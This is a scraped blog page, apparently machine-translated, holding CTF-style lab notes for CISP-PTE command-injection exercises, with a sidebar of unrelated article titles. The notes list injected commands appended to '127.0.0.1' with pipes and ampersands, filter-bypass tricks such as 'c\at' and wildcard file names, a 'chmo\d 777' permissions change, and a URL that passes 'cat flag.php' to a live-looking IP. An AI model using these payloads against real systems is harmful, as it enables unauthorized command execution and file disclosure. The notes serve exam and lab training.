当前位置:网站首页>2022 cisp-pte (III) command execution
2022 cisp-pte (III) command execution
2022-07-03 06:23:00 【A τθ】
One 、 The first
1、 Topic environment
2、 take key
2.1、 Get directory
127.0.0.1 | ls
127.0.0.1 | ls ../
2.2、 Read the file
Common command execution functions :
system("ls");
eval、exec
linux Reading documents : cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
If the key.php Do the filter :
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php
127.0.0.1 | t\ac ../key.php
The second way
1、 Topic environment
2、 The problem solving steps
2.1 Get directory
2.2 Increase authority
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*
2.3 obtain key
127.0.0.1 & t\ac ../key.*
3、 ... and 、 The third way
1、 Topic environment
2、 The problem solving steps
The fourth way
1、 Topic environment
2、 The problem solving steps
2.1、ls
2.2、 obtain key
http://81.70.245.6:50289?c=cat flag.php;
边栏推荐
- Install VM tools
- Redis cluster creation, capacity expansion and capacity reduction
- Time format record
- Project summary --04
- 第8章、MapReduce 生产经验
- Oauth2.0 - explanation of simplified mode, password mode and client mode
- When PHP uses env to obtain file parameters, it gets strings
- Oracle Database Introduction
- “我为开源打榜狂”第一周榜单公布,160位开发者上榜
- Creating postgre enterprise database by ArcGIS
猜你喜欢
Local rviz call and display of remote rostopic
ThreadLocal的简单理解
Zhiniu stock project -- 04
Project summary --01 (addition, deletion, modification and query of interfaces; use of multithreading)
Example of joint use of ros+pytoch (semantic segmentation)
Kubernetes notes (VII) kuberetes scheduling
轻松上手Fluentd,结合 Rainbond 插件市场,日志收集更快捷
In depth analysis of kubernetes controller runtime
Tabbar settings
Mysql
随机推荐
CKA certification notes - CKA certification experience post
Naive Bayes in machine learning
YOLOV3学习笔记
认识弹性盒子flex
【LeetCode】Day93-两个数组的交集 II
Selenium - 改变窗口大小,不同机型呈现的宽高长度会不一样
JMeter linked database
[set theory] relational closure (relational closure solution | relational graph closure | relational matrix closure | closure operation and relational properties | closure compound operation)
Oauth2.0 - explanation of simplified mode, password mode and client mode
Svn branch management
Cesium entity(entities) 实体删除方法
Kubesphere - set up redis cluster
Characteristics and isolation level of database
Kubernetes notes (VIII) kubernetes security
堆排序和优先队列
ODL framework project construction trial -demo
.NET程序配置文件操作(ini,cfg,config)
10万奖金被瓜分,快来认识这位上榜者里的“乘风破浪的姐姐”
[system design] proximity service
使用conda创建自己的深度学习环境